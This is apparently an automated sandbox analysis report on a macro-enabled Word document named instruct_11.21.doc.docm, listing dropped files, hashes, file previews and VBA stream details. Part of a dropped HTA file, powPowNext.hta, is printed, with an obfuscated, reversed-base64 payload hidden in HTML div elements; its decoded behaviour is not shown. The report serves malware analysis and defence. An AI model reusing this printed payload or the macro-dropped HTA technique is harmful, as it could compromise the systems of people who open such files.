      Preview: GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\error[1]
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1706
      Entropy (8bit):5.274543201400288
      Encrypted:false
      SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
      MD5:B9BEC45642FF7A2588DC6CB4131EA833
      SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
      SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
      SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\error[1]
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):3247
      Entropy (8bit):5.459946526910292
      Encrypted:false
      SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
      MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
      SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
      SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
      SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6D3C2DB.gif
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:GIF image data, version 89a, 774 x 198
      Category:dropped
      Size (bytes):14327
      Entropy (8bit):7.959467120915826
      Encrypted:false
      SSDEEP:384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv
      MD5:76DA3E2154587DD3D69A81FCDB0C7364
      SHA1:0F23E27B3A456B22A11D3FBC3132397B0DDC9357
      SHA-256:F9299AB3483A8F729B2ACA2111B46E9952D4491AC66124FEC22C1C789EBC3139
      SHA-512:A20BA525941043701E8DA5234A286FF2AF0A5F4C45998F1BA3BD59785FF4CDDAA72DE316D0BC651C68F30A6587741539B51D356BF5D6FEEAFCAE492AB277BB45
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: GIF89a.............A..)P..?...........4.............P..K.Uo.f}.v..............=..J..G..M..J..H..F..=..O..L..K..@..<..;..9..5z.R..N..M..M..3v.2s.P..1r.1q.W..F..I..J. K.&Q.Ch.A`.d............C..R.."L.T..A...h..g.*^.%T.O..P..8..4v..@.U..T..S..Q..F..>..S..P..@..2m.[..Y..X..V..R..B..U..T..W..O..T..O.*g.|...............I..M..Q..W...1.W.._..W..]..]..\..[..Z..W..V..C..5p.b..]..[..X..W..Y..Q..O..^..[..Z../a.]..\..Z..^..X.._.._..I..`..]..a..`.!c.!^.%e.$b.&f.)h.5q.>v.H~.Y..h..v.............................N..R..U..X..Z..b..`..\..`..a..b..c..d..O. d. d..R.!f."g."e.!f.#g.,m............._."k..P..9g%m........As*z.)x.,~.+|.+{.&n. \..Gy*v.6..K....../...Bm.........6....;..9..8..A..:..:..3..+l.B..C..F..N..R..T..\..i..@..@..=..A..@..D..=..7.."Uy<..%].K..N.......................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{21724630-2B33-445C-A10E-E71E570B535F}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):32768
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BB7DF04E1B0A2570657527A7E108AE23
      SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
      SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
      SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
      Malicious:false
      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{70B53CFD-265E-4516-AFB0-C6E692CB3FB3}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):21166
      Entropy (8bit):2.690771718216997
      Encrypted:false
      SSDEEP:384:IcAAooAAsM3V+oTpArJltBu+UaGmXfKfUiwvXv7vUo6s1w6:IcAAooAAsM3V+oTpArJltBu+UaGmXfKS
      MD5:DEDC6320F5E8B7E7877C43BB5618EA55
      SHA1:2143954452A74AA00B077664B82544E1DAA51AC2
      SHA-256:37EDEA11F289D8863015712C82ADF36A17584793B49D6222F70D4BD0B9DF8A8C
      SHA-512:030B6F931B4424DB621348E4089F5F69D50BA13B34772E611ADA4A20B5DF67582EB4959C5FD5B45BAFDA90E8965BEE5AAA3926ACB89A22C6403CC502A83B45D3
      Malicious:false
      Preview: ../.<.$.1.h.$.1.t.$.1.m.$.1.l.$.1.>.$.1.<.$.1.b.$.1.o.$.1.d.$.1.y.$.1.>.$.1.<.$.1.d.$.1.i.$.1.v.$.1. .$.1.i.$.1.d.$.1.=.$.1.'.$.1.y.$.1.o.$.1.u.$.1.G.$.1.i.$.1.r.$.1.l.$.1.Y.$.1.o.$.1.u.$.1.'.$.1. .$.1.s.$.1.t.$.1.y.$.1.l.$.1.e.$.1.=.$.1.'.$.1.f.$.1.o.$.1.n.$.1.t.$.1.-.$.1.c.$.1.o.$.1.l.$.1.o.$.1.r.$.1.:.$.1. .$.1.#.$.1.0.$.1.0.$.1.0.$.1.'.$.1.>.$.1.l.$.1.a.$.1.v.$.1.e.$.1.<.$.1./.$.1.d.$.1.i.$.1.v.$.1.>.$.1.<.$.1.d.$.1.i.$.1.v.$.1. ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A92381E7-919A-4DD3-B53A-282AF29674DF}.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Jul 14 02:20:08 2009, mtime=Sat Nov 13 03:59:17 2021, atime=Sat Nov 13 03:59:17 2021, length=4096, window=hide
      Category:dropped
      Size (bytes):802
      Entropy (8bit):4.4304970976243725
      Encrypted:false
      SSDEEP:12:8plhgXg/XAlCPCHemkWYCACmWicvbiHplgbNv/Z3YilMMEpxRljKZTd+8/Td+l:8b/XRlemgvB3qYR7m
      MD5:93F8A45E3472E5F7514DA0EF25F8F055
      SHA1:209FE7ABFBC89A7A8D6AF5F5779FC2804157E60B
      SHA-256:512B4C0922646E72952A13EC8F58A27523092A544D76AB2DDA9A44B131632076
      SHA-512:EB2218DFA63E448A1AD203DA9143D6AF15384C86EA37974C19FE06A0D21A5789CEAEDB404913164EAD249901BEB62D1CA0A53B2D7DA82D9A7291425005176086
      Malicious:false
      Preview: L..................F............1...Q..6K...Q..6K................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....x.1......>.C..Public..b.......:...>.C*...b...............8.....P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.......b...............-...8...[............?J......C:\Users\..#...................\\562258\Users.Public.......\.....\.....\.....\.....\.....\.P.u.b.l.i.c..........................v..*.cM.jVD.Es.................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......562258..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):138
      Entropy (8bit):4.79454253036153
      Encrypted:false
      SSDEEP:3:bDuMJlULQwXULXLpzCtYrSN7lAdRLUlmxWHixwXULXLpzCN7lAdRLUlv:bCjxXUZzUYrkOTAZNXUZz0OTA1
      MD5:82F13A5A135511405BAA26408509C708
      SHA1:6ACBF5652F9A7735E8EF40DFA3B2511AB8CADD99
      SHA-256:FE50645E8F45D4FDA888CA2CED1DFC0177DF03AE6F4AF64904B38FF61BE5FCAC
      SHA-512:C186BC9A116CE0D834F6B9A2BB2AFF2712A3D0D6367C7DE423A6A43FF7C404D640D873828E89B19EF7E65F3559FAE4116BA6C52DFCA77F9C24950CB436B2B9BD
      Malicious:false
      Preview: [folders]..Templates.LNK=0..instruct_11.21.doc.LNK=0..Public.LNK=0..powPowNext.LNK=0..[misc]..instruct_11.21.doc.LNK=0..powPowNext.LNK=0..
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\instruct_11.21.doc.LNK
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 13 03:59:11 2021, mtime=Sat Nov 13 03:59:11 2021, atime=Sat Nov 13 03:59:14 2021, length=33868, window=hide
      Category:dropped
      Size (bytes):1059
      Entropy (8bit):4.498057935068824
      Encrypted:false
      SSDEEP:12:8W7KjgXg/XAlCPCHaXjByB/VoX+WDjSIAM05UREjuicvbi0ALNoDtZ3YilMMEpxX:8Wg/XTTcUhjSPrNem0ACDv3qYQd7Qy
      MD5:E9B072419973F3B09018315D865DBBFD
      SHA1:D328641778DF7C68B26345E8E6F35E013FA0870B
      SHA-256:E250AF50A9BCAA25F9D9E24B759D07C2933D5577A4058B638AD651594A6C8B16
      SHA-512:133F44857365D2BC1E75EAB103F5684E9DE243349A7670AEB4057213A8345AF0966484C80967180377C023CB95FA629618A048C7D5883B033F4E8F94FBF27901
      Malicious:false
      Preview: L..................F.... ...F-}2K...F-}2K....g.4K...L............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1.....mSf'..Desktop.d......QK.XmSf'*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.L...mSh' .INSTRU~1.DOC..\......mSf'mSf'*.........................i.n.s.t.r.u.c.t._.1.1...2.1...d.o.c...d.o.c.m.......................-...8...[............?J......C:\Users\..#...................\\562258\Users.user\Desktop\instruct_11.21.doc.docm.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.n.s.t.r.u.c.t._.1.1...2.1...d.o.c...d.o.c.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......562258..........D_....3N.
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\powPowNext.LNK
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 13 03:59:17 2021, mtime=Sat Nov 13 03:59:17 2021, atime=Sat Nov 13 03:59:17 2021, length=3346, window=hide
      Category:modified
      Size (bytes):949
      Entropy (8bit):4.5262425156629025
      Encrypted:false
      SSDEEP:12:8I0rDgXg/XAlCPCHeMIOD/YCACmCACvAcnsV/saUCicvbip9UflAsnlgbNv/Z3Yl:8Zh/X5zCAwXuN2emzUqOWvB3qY87l
      MD5:56236162301D67A48C4F79FAB69C01E2
      SHA1:AB9D7274C770E2743BB5E8C6F536D4EB510740FC
      SHA-256:F1F1206C4E20D2D50D79A988A1099FDBF12DAD8218E118CE6DA47682AAE7C413
      SHA-512:56B70757BF10ABA67DA12201B41C6F9F1E0B26EDA7FB005625EBB748B7DCD8FD1B4084357E34B209D5BD7DD037A7A54330864FAF4089FF6EB92BF81203AD3345
      Malicious:false
      Preview: L..................F.... ...Q..6K...Q..6K....i[6K................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....x.1.....mSi'..Public..b.......:..mSi'*...b...............8.....P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....f.2.....mSi' .POWPOW~1.HTA..J......mSi'mSi'*.........................p.o.w.P.o.w.N.e.x.t...h.t.a.......q...............-...8...[............?J......C:\Users\..#...................\\562258\Users.Public\powPowNext.hta.'.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.p.o.w.P.o.w.N.e.x.t...h.t.a..........................v..*.cM.jVD.Es.................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......562258..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:false
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      C:\Users\user\Desktop\~$struct_11.21.doc.docm
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:false
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      C:\Users\Public\~$wPowNext.hta
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.5038355507075254
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
      Malicious:false
      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
      C:\Users\Public\~WRD0000.tmp
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
      Category:dropped
      Size (bytes):3346
      Entropy (8bit):5.726896594481782
      Encrypted:false
      SSDEEP:96:bGotzrVgMR61CQB7MGxag4hE8h9LU9fLtrlv:yCrVnuPMGByEkmp
      MD5:FA2B89027304712FB8366C1F6B4F2827
      SHA1:6F851332C08998D25D839112A5C9D3CA8E57FCC0
      SHA-256:6E1338E07405A9B14DB254B9769767EA824CF3AC1C8DFECB3513E95135ECEAEE
      SHA-512:8C1705A8165C062D9413F6FC00A697F6E62D038A04D5A347D036B73A97A64FE1831038C8007A1F29F80A2F765C5428463CEAE9EAF53FAED558752F24A32744CD
      Malicious:false
      Preview: <html><body><div id='youGirlYou' style='font-color: #000'>lave</div><div id='karolLikeDow' style='font-color: #000'>2FmcgcWayxGTptWZE92byBSPg4WZ3BSQjRXa2VGWPJmalNGdoISbzhXbsJjL41GboRHdwJSK7cWayxGTptWZE92by5ybwVmboIyRFRlIsAiIoRHdwpzLvMHavVHbkVmclxGbp9Gd0RmLj9WbvI2bvx2avEFbhp0a4MkN2lVcJlXR3JGZ5BnQIZ3M5pkUvcncXdlTDR0L3cDNyczLiVmY5NHO/MWak1jQtlzYBBlJ3BFO6h2aL1TYOx0QzImSDhmWNVzRhVXSCZSPTBTTSN1NyoWc0t2TSh3SBNTaVtmakNlIsAiZhx2cllyOnlmcsxUarVGRv9mcuMXZuRGKpsTamhyZpJHbMl2alR0bvJnLzRXY0V3cg0TPgIDMwkye0JXe7ZXYyByahJ3bsl1b1dUayxGI9AibldHIBNGdpZXZY9kYqV2Y0hiIhR2bkJmLzRnclFWbikyOrFmcvxWWvV3RpJHbu8Gcl52OrFmcvxWWvV3RpJHbuQXewVGI9ASM7sWYy9GbZ9WdHlmcs5ydylGdlhyZpJHbMl2alR0bvJnLyV2cw9mbzVmYvRWepszahJ3bsl1b1dUayxmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcRXdiV2RpJHbM9WYk5iawdmIsAiMpszahJ3bsl1b1dUayxmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHInlmcsxUarVGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKic3cjJXawRnLzhWZsxmIpsjdhJHI59WdQ92dUVnYlBSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7cWayxGTptWZM9mdl5ic1
      C:\users\public\powPowNext.hta (copy)
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
      Category:dropped
      Size (bytes):3346
      Entropy (8bit):5.726896594481782
      Encrypted:false
      SSDEEP:96:bGotzrVgMR61CQB7MGxag4hE8h9LU9fLtrlv:yCrVnuPMGByEkmp
      MD5:FA2B89027304712FB8366C1F6B4F2827
      SHA1:6F851332C08998D25D839112A5C9D3CA8E57FCC0
      SHA-256:6E1338E07405A9B14DB254B9769767EA824CF3AC1C8DFECB3513E95135ECEAEE
      SHA-512:8C1705A8165C062D9413F6FC00A697F6E62D038A04D5A347D036B73A97A64FE1831038C8007A1F29F80A2F765C5428463CEAE9EAF53FAED558752F24A32744CD
      Malicious:false
      Preview: <html><body><div id='youGirlYou' style='font-color: #000'>lave</div><div id='karolLikeDow' style='font-color: #000'>2FmcgcWayxGTptWZE92byBSPg4WZ3BSQjRXa2VGWPJmalNGdoISbzhXbsJjL41GboRHdwJSK7cWayxGTptWZE92by5ybwVmboIyRFRlIsAiIoRHdwpzLvMHavVHbkVmclxGbp9Gd0RmLj9WbvI2bvx2avEFbhp0a4MkN2lVcJlXR3JGZ5BnQIZ3M5pkUvcncXdlTDR0L3cDNyczLiVmY5NHO/MWak1jQtlzYBBlJ3BFO6h2aL1TYOx0QzImSDhmWNVzRhVXSCZSPTBTTSN1NyoWc0t2TSh3SBNTaVtmakNlIsAiZhx2cllyOnlmcsxUarVGRv9mcuMXZuRGKpsTamhyZpJHbMl2alR0bvJnLzRXY0V3cg0TPgIDMwkye0JXe7ZXYyByahJ3bsl1b1dUayxGI9AibldHIBNGdpZXZY9kYqV2Y0hiIhR2bkJmLzRnclFWbikyOrFmcvxWWvV3RpJHbu8Gcl52OrFmcvxWWvV3RpJHbuQXewVGI9ASM7sWYy9GbZ9WdHlmcs5ydylGdlhyZpJHbMl2alR0bvJnLyV2cw9mbzVmYvRWepszahJ3bsl1b1dUayxmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcRXdiV2RpJHbM9WYk5iawdmIsAiMpszahJ3bsl1b1dUayxmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHInlmcsxUarVGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKic3cjJXawRnLzhWZsxmIpsjdhJHI59WdQ92dUVnYlBSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7cWayxGTptWZM9mdl5ic1

      Static File Info

      General

      File type:Microsoft Word 2007+
      Entropy (8bit):7.793957028458385
      TrID:
      • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
      • Word Microsoft Office Open XML Format document (49504/1) 32.35%
      • Word Microsoft Office Open XML Format document (43504/1) 28.43%
      • ZIP compressed archive (8000/1) 5.23%
      File name:instruct_11.21.doc.docm
      File size:34817
      MD5:a9490d94cf547e27dcc0d52dc72e74e7
      SHA1:a00e440eb13f84c8b8faba5b81a7d85fce2a4074
      SHA256:ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394
      SHA512:43dddc14679f16735c6f74c1b3d40b0be23bf995e9dd9a49ab9cd780cac6314a15ce73ab3943cf3346bbc77be2b2355ac6a8723c56d1ebe6872c9697f5048bc4
      SSDEEP:384:xS6JqYxSJTvfpHhx/gFj0EEYpcVhE1ltmTV/YZO4NSCWl822TnUCSdQQUfwliiid:ZJqY0phb4a02VWnZdw9822zAEhXd
      File Content Preview:PK..........!...O.............[Content_Types].xml ...(.........................................................................................................................................................................................................

      File Icon

      Icon Hash:e4e6a2a2acbcbcac

      Static OLE Info

      General

      Document Type:OpenXML
      Number of OLE Files:1

      OLE File "/opt/package/joesandbox/database/analysis/520837/sample/instruct_11.21.doc.docm"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:False
      Contains Word Document Stream:
      Contains Workbook/Book Stream:
      Contains PowerPoint Document Stream:
      Contains Visio Document Stream:
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Title:
      Subject:
      Author:ozdgjmh
      Keywords:ath.txeNwoPwop\cilbup\sresu\:c
      Template:Normal
      Last Saved By:&#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100; Windows
      Revion Number:2
      Total Edit Time:0
      Create Time:2021-11-10T09:34:00Z
      Last Saved Time:2021-11-10T09:34:00Z
      Number of Pages:1
      Number of Words:116
      Number of Characters:9917
      Creating Application:Microsoft Office Word
      Security:0

      Document Summary

      Number of Lines:42
      Number of Paragraphs:1
      Thumbnail Scaling Desired:false
      Company:
      Contains Dirty Links:false
      Shared Document:false
      Changed Hyperlinks:false
      Application Version:16.0000

      Streams with VBA

      VBA File Name: ThisDocument.cls, Stream Size: 2271
      General
      Stream Path:VBA/ThisDocument
      VBA File Name:ThisDocument.cls
      Stream Size:2271
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . l . m . E . , l R . . . D . m 7 ^ e . . F . s 2 Z . g w . . . . . . . . . . . . . . . . . . . . . | . . K . . . K . . ; . > . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . | . . K . . . K . . ; . > . | . . . . l . m . E . , l R . . . D . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 06 00 01 00 00 b4 04 00 00 e4 00 00 00 ea 01 00 00 e2 04 00 00 f0 04 00 00 e4 06 00 00 03 00 00 00 01 00 00 00 4c 2f ec fa 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d6 0d 8e 6c a5 6d c7 45 97 2c 6c 52 13 2e a9 44 06 6d 37 5e 65 13 f2 46 b7 73 32 5a ed 67 77 90 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code
      VBA File Name: main.bas, Stream Size: 1122
      General
      Stream Path:VBA/main
      VBA File Name:main.bas
      Stream Size:1122
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
